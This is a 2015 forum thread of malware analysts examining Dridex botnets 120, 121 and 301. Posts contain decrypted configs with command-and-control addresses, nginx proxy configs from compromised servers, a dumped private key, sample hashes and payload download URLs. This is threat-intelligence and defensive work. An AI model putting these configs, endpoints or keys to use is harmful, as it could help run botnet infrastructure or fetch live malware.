A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #27063  by Xylitol
 Tue Oct 27, 2015 11:43 am
Dridex 301 https://www.virustotal.com/en/file/b029 ... /analysis/
unpacked (in attachement): https://www.virustotal.com/en/file/1f20 ... 445944500/
00410960 $ 60 PUSHAD
Code: Select all
0168F68C  3C 63 6F 6E 66 69 67 20 62 6F 74 6E 65 74 3D 22  <config botnet="
0168F69C  33 30 31 22 3E 0D 0A 20 20 20 3C 73 65 72 76 65  301">..   <serve
0168F6AC  72 5F 6C 69 73 74 3E 0D 0A 34 36 2E 33 37 2E 31  r_list>..46.37.1
0168F6BC  2E 38 38 3A 34 37 33 0D 0A 39 31 2E 31 34 32 2E  .88:473..91.142.
0168F6CC  32 32 31 2E 31 39 35 3A 35 34 34 35 0D 0A 31 39  221.195:5445..19
0168F6DC  38 2E 38 39 2E 39 38 2E 32 31 32 3A 33 34 34 33  8.89.98.212:3443
0168F6EC  0D 0A 20 20 20 3C 2F 73 65 72 76 65 72 5F 6C 69  ..   </server_li
0168F6FC  73 74 3E 0D 0A 3C 2F 63 6F 6E 66 69 67 3E        st>..</config>
004108C0 /$ 57 PUSH EDI
Code: Select all
01512688  3C 6C 6F 61 64 65 72 3E 3C 67 65 74 5F 6D 6F 64  <loader><get_mod
01512698  75 6C 65 20 75 6E 69 71 75 65 3D 22 25 73 22 20  ule unique="%s"
015126A8  62 6F 74 6E 65 74 3D 22 25 64 22 20 73 79 73 74  botnet="%d" syst
015126B8  65 6D 3D 22 25 64 22 20 6E 61 6D 65 3D 22 25 73  em="%d" name="%s
015126C8  22 20 62 69 74 3D 22 25 64 22 2F 3E              " bit="%d"/>
Dridex + Bruteres: inside the dridex spam machine ~ https://www.lexsi.com/securityhub/dride ... e/?lang=en
Attachments
infected
(76.06 KiB) Downloaded 84 times
infected
(53.88 KiB) Downloaded 99 times
 #27075  by Xylitol
 Wed Oct 28, 2015 10:58 am
Dridex 120 https://www.virustotal.com/en/file/2fdd ... /analysis/ - VxVault
Renamed as 'fsociety.exe' instead of 'crypted120med.exe'
Unpacked in attachement.
Code: Select all
0178F68C  3C 63 6F 6E 66 69 67 20 62 6F 74 6E 65 74 3D 22  <config botnet="
0178F69C  31 32 30 22 3E 0D 0A 20 20 20 3C 73 65 72 76 65  120">..   <serve
0178F6AC  72 5F 6C 69 73 74 3E 0D 0A 35 2E 31 38 37 2E 34  r_list>..5.187.4
0178F6BC  2E 31 38 33 3A 34 37 33 0D 0A 36 38 2E 31 36 39  .183:473..68.169
0178F6CC  2E 35 34 2E 31 37 39 3A 36 34 34 36 0D 0A 36 37  .54.179:6446..67
0178F6DC  2E 32 31 31 2E 39 35 2E 32 32 38 3A 35 34 34 35  .211.95.228:5445
0178F6EC  0D 0A 20 20 20 3C 2F 73 65 72 76 65 72 5F 6C 69  ..   </server_li
0178F6FC  73 74 3E 0D 0A 3C 2F 63 6F 6E 66 69 67 3E 00 00  st>..</config>..
Attachments
infected
(53.86 KiB) Downloaded 91 times
 #27080  by benkow_
 Wed Oct 28, 2015 1:56 pm
Hi,
a Quick look around the Botnet 120 (botnet against France):
Inside the .doc macro, you can find some payload via URL: XXX.XXX.XXX:XXX/images/getimg.php or /uniq/load.php
All these server are just Nginx proxy. They are infected via some Wordpress vuln or other old web vuln.
On these servers you can see 3 processes runnig. For example:
Code: Select all
root      6616  0.0  0.0   3944   620 ?        Ss   Oct19   0:00 /tmp/.estbuild/lib/ld-linux.so.2
root      6617  0.0  0.1   4880  1944 ?        S    Oct19   0:05 /tmp/.estbuild/lib/ld-linux.so.2
root      6618  0.0  0.1   4884  1948 ?        S    Oct19   0:08 /tmp/.estbuild/lib/ld-linux.so.2
this is the proxy stuff (attached .estbuild.7zip).
Some references about this on stack overflow:
http://stackoverflow.com/questions/3322 ... 120med-exe
By dumping memory processes you can find the proxy configuration:
Code: Select all
worker_processes                  2;
error_log                         /dev/null;
pid                               /tmp/.estbuild/nginx.pid;
events {
    worker_connections            4096;
#    use                           epoll;    
}
http {
    access_log			  /dev/null;
    client_max_body_size        	   200m;
    chunked_transfer_encoding off;
    server {
        listen                    8080;
	location /m348-2hdk-cb2 {
		information;
	}
        
        
        location / {
		proxy_pass                 http://95.211(.)241.118:8500;
		proxy_redirect             off;
		proxy_set_header           Host             $host;
		proxy_set_header           X-Forwarded-For  $remote_addr;
		proxy_set_header           X-Real-IP        $remote_addr;
		proxy_connect_timeout      180;
		proxy_send_timeout         180;
		proxy_read_timeout         180;
		proxy_buffer_size          4k;
		proxy_buffers              4 32k;
		proxy_busy_buffers_size    64k;
		proxy_temp_file_write_size 64k;
		proxy_temp_path            /tmp/.estbuild/tmp/;
	}
   }
}
So, the real server seems to be 95.211(.)241.118 (it's up since more that 2 week)
Since 2 weeks (and maybe more) this server spread:
0353a7702daeb560d64b10947458206a
9d4225ecdcda7fe9a5eae48601919114
1c21aeb3dc0e30e05630a3f61aae83f9
c4934e3e1858dbbeb4ea872d0fdbbd79
82bb00dcac6411669ce6ae5a60cbb3b3
c4934e3e1858dbbeb4ea872d0fdbbd79
8829bf4bc1400360e28ccc88c669c129
8b27c369dc690b4cb31b3c6ff114c7bf
2b2bd1166a8ed8fbcc34924c4f920083
fcb74bbc59d90a51df252c2b695cb679
a44db256a22cd0e61e3630976d82a351
f91c822fa2ce62ab8bd6419764262c70

An example of the static conf of these sample:
Code: Select all
<config botnet="120">
<server_list>
5.187.4.183:473
68.169.54.179:6446
67.211.95.228:5445
</server_list>
</config> 
For these server, same stuff than for the payload spreading: Shitty Wordpress + old vuln = Nginx proxy.
A little difference exist, on /tmp/.estbuild/certs/ you can found some cert:
Code: Select all
-----BEGIN CERTIFICATE-----
MIIDUzCCAjugAwIBAgIJAL4VLJGwJ5B5MA0GCSqGSIb3DQEBBQUAMEAxCzAJBgNV
BAYTAkZSMRkwFwYDVQQKDBBJZWFsdSBDZXNhcyBJbmMuMRYwFAYDVQQDDA1hbHlm
b3V0aXBzLmJzMB4XDTE1MTAyNjA4NDMyN1oXDTE2MTAyNTA4NDMyN1owQDELMAkG
A1UEBhMCRlIxGTAXBgNVBAoMEEllYWx1IENlc2FzIEluYy4xFjAUBgNVBAMMDWFs
eWZvdXRpcHMuYnMwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC+B9sE
JIfqhUS7aMsMBhsFPh4VgTZ48Njx2+7wc6Vs5MolCvlxeb6kMkoyvLQczz7khmga
PhsizTpXjT0S49r4j5p4b7DqhFdS7zXh5Ugsg23GPgm1ZLonMOAtFPn5aNpltpto
J9v5BH6fikJ7VOZuCgEJzMK+irWgSw4loAO8LxR7eIoQlKXsFQ3npUpFgSji6MlZ
Eob2IGYS6XPYek4IfT1GhT/MsLZQnDXaGQ9QnoE8zBJR/nCQjaLSwBU1k0+eFq4A
buCJ2zw3B2tbCueBEmNJcvDWNT4E6mwdse1yDUbLFKOUun5jX+96IXTWEXyk9xEI
erqe+FYUK8523VyxAgMBAAGjUDBOMB0GA1UdDgQWBBRsvBtcjSmURV4zWWPX7PO+
6LZhujAfBgNVHSMEGDAWgBRsvBtcjSmURV4zWWPX7PO+6LZhujAMBgNVHRMEBTAD
AQH/MA0GCSqGSIb3DQEBBQUAA4IBAQBVtND//cs4fv9AxvQstyWvbutoHRHnvp9H
llaYvuJDsYxNjVkSOc9MH0Wg0iTpEbbW6Ds34he/+d+kZ1jWhFXL35Vofr85V/VH
xxUK+k3mQ0+Z7n7tCKPqrZyFJfgKrpa8Bo4+MjxwKuiLQ/CqCwV/NjyatyFcayvc
aiDOW37pzJ8eXv2maxokpUjsBwpHSUlZWuDR63ePCi1rlOwnjyt8FMqqsEsg7bpT
Dw+0ym7GBO43Iehj+NomgrfjfVSm9MA/RF2BJJCIDX+Ukcj5IX/sXhZoQdFqBU0O
0/dvHubDj7b8uUk6BKUQa8md3DoBwgqOcG2vK2LGylRcIQbA5Wb4
-----END CERTIFICATE-----

-----BEGIN PRIVATE KEY-----
MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQC+B9sEJIfqhUS7
aMsMBhsFPh4VgTZ48Njx2+7wc6Vs5MolCvlxeb6kMkoyvLQczz7khmgaPhsizTpX
jT0S49r4j5p4b7DqhFdS7zXh5Ugsg23GPgm1ZLonMOAtFPn5aNpltptoJ9v5BH6f
ikJ7VOZuCgEJzMK+irWgSw4loAO8LxR7eIoQlKXsFQ3npUpFgSji6MlZEob2IGYS
6XPYek4IfT1GhT/MsLZQnDXaGQ9QnoE8zBJR/nCQjaLSwBU1k0+eFq4AbuCJ2zw3
B2tbCueBEmNJcvDWNT4E6mwdse1yDUbLFKOUun5jX+96IXTWEXyk9xEIerqe+FYU
K8523VyxAgMBAAECggEAbeCQ7PZKeHoSYeKX9R3apc9jCcAqxQdOCZrHr9TOhAZO
M9kCnnBsoPhLGsctxbK3hN+KdhIPErJj15fdBn0lca9m+9hpDVD0RQn3t+QhNUvR
P11Ds9TIJj0Ggkqst1+/WCyb8z+I25WTuZ/yDOnsSxgRvZ7dw9rkZgi/51V8k2QO
M8zlX371p0URnJCZpvA5Oe4A1c+lUkuzesZ3Yf8zru+E/iDJSFovSyi552RcSacw
7biET8dDyqdbdXX4cDttQj83+9KHNCAQkzBezoNuuyHgOI/xxqVTLUBoIGr0HcBx
Xqiu+UjCUnNA05+jJiPkFrKVp2VvZfbfBSrKuoxQAQKBgQDnQIhOrY0LluWeY+T/
Ew5fLlJHX29aYcafJrpevJ+CPaBrryqoxlviQOCT2R+krbr6p6VR5JQQh0hCdY5+
lZd/iCIJpptoX0IPr8TNjVZE3CmNZQ/nvsVpwzvGspI8KA7iM+BmwNpGrnxsPRR8
hV+WP3HDmqcPA/XStv5mQF6mgQKBgQDSXgGqz/8mhnTWa3TN4dciwgKKHDkn/+F8
ns39GJFE8q+cMlgl+xtk1xtMuB6B5xx447JdTlQm3sGnPTrKUW3u7zcdzC7QGBDP
+wF6ZdQbwZ35Lk50lYR9PUs4XNJLuCJ5Z3tE9jJQvCkkQtgKbAV61BtUk5/SYx/9
AbFw4Mx+MQKBgE09jsnIyi2uzy9iamCQeuJr1GumgskLk44hH2r5UcXs06JkNbl9
177wsJJxmVIl/SgvytZZpOMIbKhWH6xERv//9m6Gya3I84XNzcxigwgpCXAC65ca
b1HuNg8eIh4Zuy7u6OspSz8ElOaKWEdnPRAwTM1q4JXxWrBxEvQQWA0BAoGAe8sC
JCh+N4eMHdniRH2QAk40/F0bbWRwpss04KmiYvaFTN97a+5W8oJ6+CypFzyPTrx/
a9T6RF11jBrGC+TbUm3G+2v6aE6hJiLJfeOKbEMF2WrclFKgQqrdJu/IePKEpvi0
W6KdfVEczM/hHlDu8Jb89kphFIdsfZCPgKNo8yECgYBvLMcT+s0nLqE7cr0OKqPa
afzneAefwWhPKe3L1qlmoqwHpjB8xuXiN4gW5vCB0LMKcoU83KjD6q5dayLOa89o
F6LDS6Kz4CJrduwcAIdcPTsMyaHkLlxkH6fbNGQj8r87XQUxWVho2C8edoYRmR/f
Sufj8l61WsiI0HHeJuYdfA==
-----END PRIVATE KEY-----
And the proxy conf:
Code: Select all
worker_processes                  2;

error_log                         /dev/null;
pid                               /tmp/.estbuild/nginx.pid;
events {
    worker_connections            4096;
#    use                           epoll;    
}
http {
    access_log			  /dev/null;
    client_max_body_size        	   200m;
    chunked_transfer_encoding off;
    server {
        listen                    5445;
	location /m348-2hdk-cb2 {
		information;
	}
        ssl on; ssl_certificate /tmp/.estbuild/certs/server.crt; ssl_certificate_key /tmp/.estbuild/certs/server.key;     
        location / {
		proxy_pass                 http://87.249.215.200:8002;
		proxy_redirect             off;
		proxy_set_header           Host             $host;
		proxy_set_header           X-Forwarded-For  $remote_addr;
		proxy_set_header           X-Real-IP        $remote_addr;
		proxy_connect_timeout      180;
		proxy_send_timeout         180;
		proxy_read_timeout         180;
		proxy_buffer_size          4k;
		proxy_buffers              4 32k;
		proxy_busy_buffers_size    64k;
		proxy_temp_file_write_size 64k;
		proxy_temp_path            /tmp/.estbuild/tmp/;
	}
   }
}
I hope it can help somebody
Attachments
(1.73 MiB) Downloaded 97 times
 #27136  by benkow_
 Tue Nov 03, 2015 8:29 am
Dridex 120 change to 121. Sample attached
always same server but different pattern:
Code: Select all
95.211.241.118:8500/imagess/getimg.php
Code: Select all
 <config botnet="121">
 <server_list>
 128.199.239.142:8843
 5.187.4.183:43
 68.169.54.179:6446
 67.211.95.228:5445   
 </server_list>
 </config>
Attachments
infected
(187.78 KiB) Downloaded 99 times
 #27223  by kekieres
 Fri Nov 13, 2015 3:43 pm
Hi,

Some of my users have received the attached .DOC that looks like a malware:
https://malwr.com/analysis/N2I1MjljYzIz ... E2ZTQyNjM/

But no A/V detect it as malicious in VT:
https://www.virustotal.com/es/file/9365 ... 447428618/

The sample in malwr.com did a POST request to XXX://<109.234.37.214>/alikaps/terminator.php and the response is another exe, named ulysse.exe

I've stopped here, and not analyze anything about the 2 stage. I'm not a reverse engineer but suspect that probably the DOC file is something known using a crypter, but just in case it may be something really new I'm sharing it here.

Happy reversing!

Kekieres
Attachments
(11.97 KiB) Downloaded 81 times
 #27225  by Xylitol
 Fri Nov 13, 2015 6:58 pm
Attachments
infected
(50.75 KiB) Downloaded 72 times
 #27377  by benkow_
 Tue Dec 08, 2015 10:13 am
Botnet 120/121 spread new sample.
Conf obfuscation seems to have change. No more .sdata section
hXXp://91.203.5.169/jeremy/clarkson.php
hXXp://92.63.101.229/jeremy/clarkson.php
hxxp://91.223.88.50/jeremy/clarkson.php

94.73.155.11:2448
115.249.247.26:4538
87.106.101.55:4538

attached
Attachments
infected
(191.53 KiB) Downloaded 90 times
  • 1
  • 11
  • 12
  • 13
  • 14
  • 15